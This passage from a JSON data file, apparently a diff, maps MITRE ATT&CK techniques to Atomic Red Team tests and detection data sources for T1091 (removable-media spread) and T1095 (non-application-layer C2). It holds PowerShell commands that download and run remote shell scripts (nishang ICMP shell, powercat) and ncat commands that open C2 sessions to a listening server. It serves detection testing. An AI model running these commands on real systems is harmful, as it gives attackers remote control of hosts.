"data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1091", + "command_list": [ + "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path $Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n" + ], + "commands": [ + { + "command": "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path $Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n", + "source": "atomics/T1091/T1091.yaml", + "name": "Atomic Red Team Test - Replication Through Removable Media" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1091", + "display_name": "Replication Through Removable Media", + "atomic_tests": [ + { + "name": "USB Malware Spread Simulation", + "auto_generated_guid": "d44b7297-622c-4be8-ad88-ec40d7563c75", + "description": "Simulates an adversary copying malware to all connected removable drives. \n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "command": "$RemovableDrives=@()\n$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nwrite-host \"Removable Drive Found:\" $Drive\nNew-Item -Path $Drive/T1091Test1.txt -ItemType \"file\" -Force -Value \"T1091 Test 1 has created this file to simulate malware spread to removable drives.\"\n}\n", + "cleanup_command": "$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter \"drivetype=2\" | select-object -expandproperty DeviceID\nForEach ($Drive in $RemovableDrives)\n{\nRemove-Item -Path $Drive\\T1091Test1.txt -Force -ErrorAction Ignore\n}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "219", + " 421", + " 4657", + "USB/PnP - IDs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + [ + "4657", + "USB/PnP - IDs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "https://www.justice.gov/file/1080281/download", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1095", + "command_list": [ + "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n", + null, + "cmd /c $env:TEMP\\T1095\\nmap-7.80\\ncat.exe #{server_ip} #{server_port}\n", + "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "cmd /c #{ncat_exe} 127.0.0.1 #{server_port}\n", + "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p #{server_port}\n" + ], + "commands": [ + { + "command": "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": null, + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c $env:TEMP\\T1095\\nmap-7.80\\ncat.exe #{server_ip} #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "cmd /c #{ncat_exe} 127.0.0.1 #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + }, + { + "command": "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p #{server_port}\n", + "source": "atomics/T1095/T1095.yaml", + "name": "Atomic Red Team Test - Non-Application Layer Protocol" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1095", + "display_name": "Non-Application Layer Protocol", + "atomic_tests": [ + { + "name": "ICMP C2", + "auto_generated_guid": "0268e63c-e244-42db-bef7-72a9e59fc1fc", + "description": "This will attempt to start C2 Session Using ICMP. For information on how to set up the listener\nrefer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "The IP address of the listening server", + "type": "String", + "default": "127.0.0.1" + } + }, + "executor": { + "command": "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress #{server_ip}\n", + "name": "powershell" + } + }, + { + "name": "Netcat C2", + "auto_generated_guid": "bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37", + "description": "Start C2 Session Using Ncat\nTo start the listener on a Linux device, type the following: \nnc -l -p \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_port": { + "description": "The port for the C2 connection", + "type": "Integer", + "default": 80 + }, + "ncat_exe": { + "description": "The location of ncat.exe", + "type": "Path", + "default": "$env:TEMP\\T1095\\nmap-7.80\\ncat.exe" + }, + "ncat_path": { + "description": "The folder path of ncat.exe", + "type": "Path", + "default": "$env:TEMP\\T1095" + }, + "server_ip": { + "description": "The IP address or domain name of the listening server", + "type": "String", + "default": "127.0.0.1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "ncat.exe must be available at specified location (#{ncat_exe})\n", + "prereq_command": "if( Test-Path \"#{ncat_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null\n$parentpath = Split-Path (Split-Path \"#{ncat_exe}\"); $zippath = \"$parentpath\\nmap.zip\"\nInvoke-WebRequest \"https://nmap.org/dist/nmap-7.80-win32.zip\" -OutFile \"$zippath\"\n Expand-Archive $zippath $parentpath -Force\n $unzipPath = Join-Path $parentPath \"nmap-7.80\"\nif( $null -eq (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | ?{$_.DisplayName -like \"Microsoft Visual C++*\"}) ) {\n Start-Process (Join-Path $unzipPath \"vcredist_x86.exe\")\n}\n" + } + ], + "executor": { + "command": "cmd /c #{ncat_exe} #{server_ip} #{server_port}\n", + "name": "powershell" + } + }, + { + "name": "Powercat C2", + "auto_generated_guid": "3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e", + "description": "Start C2 Session Using Powercat\nTo start the listener on a Linux device, type the following: \nnc -l -p \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "The IP address or domain name of the listening server", + "type": "String", + "default": "127.0.0.1" + }, + "server_port": { + "description": "The port for the C2 connection", + "type": "Integer", + "default": 80 + } + }, + "executor": { + 